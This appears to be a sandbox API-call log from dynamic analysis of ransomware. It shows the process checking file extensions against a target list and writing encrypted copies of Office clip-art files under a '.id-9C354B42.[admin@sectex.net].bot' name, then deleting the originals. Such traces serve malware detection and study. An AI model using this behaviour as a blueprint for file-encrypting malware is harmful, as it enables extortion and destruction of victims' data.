	[0162.485] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0162.485] lstrlenW (lpString=".pdf") returned 4
	[0162.485] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString=".xls") returned 4
	[0162.485] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.485] lstrlenW (lpString=".xlsx") returned 5
	[0162.485] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0162.485] lstrlenW (lpString=".ppt") returned 4
	[0162.485] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.485] lstrlenW (lpString=".zip") returned 4
	[0162.485] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.485] lstrlenW (lpString=".rar") returned 4
	[0162.485] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.486] lstrlenW (lpString=".bz2") returned 4
	[0162.486] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.486] lstrlenW (lpString=".7z") returned 3
	[0162.486] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.486] lstrlenW (lpString=".dbf") returned 4
	[0162.486] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.486] lstrlenW (lpString=".1cd") returned 4
	[0162.486] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107500.WMF") returned 63
	[0162.486] lstrlenW (lpString=".jpg") returned 4
	[0162.486] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.486] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.486] lstrlenW (lpString="J0107526.WMF") returned 12
	[0162.486] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.487] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7948) returned 1
	[0162.487] CloseHandle (hObject=0x3b8) returned 1
	[0162.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf")) returned 0x20
	[0162.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.487] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.488] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.488] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.488] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.488] GetLastError () returned 0x0
	[0162.488] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1f0c, lpOverlapped=0x0) returned 1
	[0162.490] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1f10, lpOverlapped=0x0) returned 1
	[0162.491] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.491] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.491] SetEndOfFile (hFile=0x25c) returned 1
	[0162.491] CloseHandle (hObject=0x25c) returned 1
	[0162.492] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.492] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.494] CloseHandle (hObject=0x3b8) returned 1
	[0162.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107526.wmf")) returned 1
	[0162.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.495] lstrlenW (lpString=".doc") returned 4
	[0162.495] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString=".docx") returned 5
	[0162.495] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0162.495] lstrlenW (lpString=".pdf") returned 4
	[0162.495] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString=".xls") returned 4
	[0162.495] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.495] lstrlenW (lpString=".xlsx") returned 5
	[0162.495] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0162.495] lstrlenW (lpString=".ppt") returned 4
	[0162.495] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.495] lstrlenW (lpString=".zip") returned 4
	[0162.495] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.495] lstrlenW (lpString=".rar") returned 4
	[0162.495] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString=".bz2") returned 4
	[0162.495] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString=".7z") returned 3
	[0162.495] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.495] lstrlenW (lpString=".dbf") returned 4
	[0162.495] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.495] lstrlenW (lpString=".1cd") returned 4
	[0162.495] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.495] lstrlenW (lpString=".jpg") returned 4
	[0162.495] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.496] lstrlenW (lpString=".doc") returned 4
	[0162.496] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString=".docx") returned 5
	[0162.496] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0162.496] lstrlenW (lpString=".pdf") returned 4
	[0162.496] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString=".xls") returned 4
	[0162.496] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.496] lstrlenW (lpString=".xlsx") returned 5
	[0162.496] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0162.496] lstrlenW (lpString=".ppt") returned 4
	[0162.496] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.496] lstrlenW (lpString=".zip") returned 4
	[0162.496] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.496] lstrlenW (lpString=".rar") returned 4
	[0162.496] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString=".bz2") returned 4
	[0162.496] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString=".7z") returned 3
	[0162.496] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.496] lstrlenW (lpString=".dbf") returned 4
	[0162.496] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.496] lstrlenW (lpString=".1cd") returned 4
	[0162.496] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107526.WMF") returned 63
	[0162.496] lstrlenW (lpString=".jpg") returned 4
	[0162.496] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.497] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.497] lstrlenW (lpString="J0107528.WMF") returned 12
	[0162.497] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.497] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=6792) returned 1
	[0162.498] CloseHandle (hObject=0x3b8) returned 1
	[0162.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf")) returned 0x20
	[0162.498] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.498] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.498] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.499] GetLastError () returned 0x0
	[0162.499] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1a88, lpOverlapped=0x0) returned 1
	[0162.503] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1a90, lpOverlapped=0x0) returned 1
	[0162.504] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.504] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.504] SetEndOfFile (hFile=0x25c) returned 1
	[0162.504] CloseHandle (hObject=0x25c) returned 1
	[0162.504] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.504] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.506] CloseHandle (hObject=0x3b8) returned 1
	[0162.507] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.507] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107528.wmf")) returned 1
	[0162.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.507] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.507] lstrlenW (lpString=".doc") returned 4
	[0162.507] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.507] lstrlenW (lpString=".docx") returned 5
	[0162.507] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0162.508] lstrlenW (lpString=".pdf") returned 4
	[0162.508] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString=".xls") returned 4
	[0162.508] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.508] lstrlenW (lpString=".xlsx") returned 5
	[0162.508] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0162.508] lstrlenW (lpString=".ppt") returned 4
	[0162.508] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.508] lstrlenW (lpString=".zip") returned 4
	[0162.508] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.508] lstrlenW (lpString=".rar") returned 4
	[0162.508] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString=".bz2") returned 4
	[0162.508] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString=".7z") returned 3
	[0162.508] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.508] lstrlenW (lpString=".dbf") returned 4
	[0162.508] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.508] lstrlenW (lpString=".1cd") returned 4
	[0162.508] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.508] lstrlenW (lpString=".jpg") returned 4
	[0162.508] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.508] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.508] lstrlenW (lpString=".doc") returned 4
	[0162.508] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.508] lstrlenW (lpString=".docx") returned 5
	[0162.509] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0162.509] lstrlenW (lpString=".pdf") returned 4
	[0162.509] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.509] lstrlenW (lpString=".xls") returned 4
	[0162.509] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.509] lstrlenW (lpString=".xlsx") returned 5
	[0162.509] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0162.509] lstrlenW (lpString=".ppt") returned 4
	[0162.509] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.509] lstrlenW (lpString=".zip") returned 4
	[0162.509] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.509] lstrlenW (lpString=".rar") returned 4
	[0162.509] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.509] lstrlenW (lpString=".bz2") returned 4
	[0162.509] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.509] lstrlenW (lpString=".7z") returned 3
	[0162.509] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.509] lstrlenW (lpString=".dbf") returned 4
	[0162.509] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.509] lstrlenW (lpString=".1cd") returned 4
	[0162.509] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.509] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107528.WMF") returned 63
	[0162.509] lstrlenW (lpString=".jpg") returned 4
	[0162.509] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.509] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0162.510] lstrlenW (lpString="J0107544.WMF") returned 12
	[0162.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.510] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=26768) returned 1
	[0162.510] CloseHandle (hObject=0x3b8) returned 1
	[0162.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf")) returned 0x20
	[0162.510] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.510] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8
	[0162.511] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.511] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.511] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0162.511] GetLastError () returned 0x0
	[0162.511] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x6890, lpOverlapped=0x0) returned 1
	[0162.514] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x68a0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x68a0, lpOverlapped=0x0) returned 1
	[0162.515] ReadFile (in: hFile=0x3b8, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0162.515] WriteFile (in: hFile=0x25c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0162.515] SetEndOfFile (hFile=0x25c) returned 1
	[0162.515] CloseHandle (hObject=0x25c) returned 1
	[0162.515] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.515] SetEndOfFile (hFile=0x3b8) returned 1
	[0162.518] CloseHandle (hObject=0x3b8) returned 1
	[0162.518] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0162.518] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107544.wmf")) returned 1
	[0162.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.519] lstrlenW (lpString=".doc") returned 4
	[0162.519] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.519] lstrlenW (lpString=".docx") returned 5
	[0162.519] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0162.519] lstrlenW (lpString=".pdf") returned 4
	[0162.519] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.519] lstrlenW (lpString=".xls") returned 4
	[0162.519] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.519] lstrlenW (lpString=".xlsx") returned 5
	[0162.519] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0162.519] lstrlenW (lpString=".ppt") returned 4
	[0162.519] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0162.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.519] lstrlenW (lpString=".zip") returned 4
	[0162.519] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0162.519] lstrlenW (lpString=".rar") returned 4
	[0162.519] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0162.519] lstrlenW (lpString=".bz2") returned 4
	[0162.519] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0162.519] lstrlenW (lpString=".7z") returned 3
	[0162.519] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0162.519] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.519] lstrlenW (lpString=".dbf") returned 4
	[0162.520] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.520] lstrlenW (lpString=".1cd") returned 4
	[0162.520] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.520] lstrlenW (lpString=".jpg") returned 4
	[0162.520] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.520] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107544.WMF") returned 63
	[0162.520] lstrlenW (lpString=".doc") returned 4
	[0162.520] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString=".docx") returned 5
	[0162.520] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0162.520] lstrlenW (lpString=".pdf") returned 4
	[0162.520] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0162.520] lstrlenW (lpString=".xls") returned 4
	[0162.520] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0162.520] lstrlenW (lpString=".xlsx") returned 5
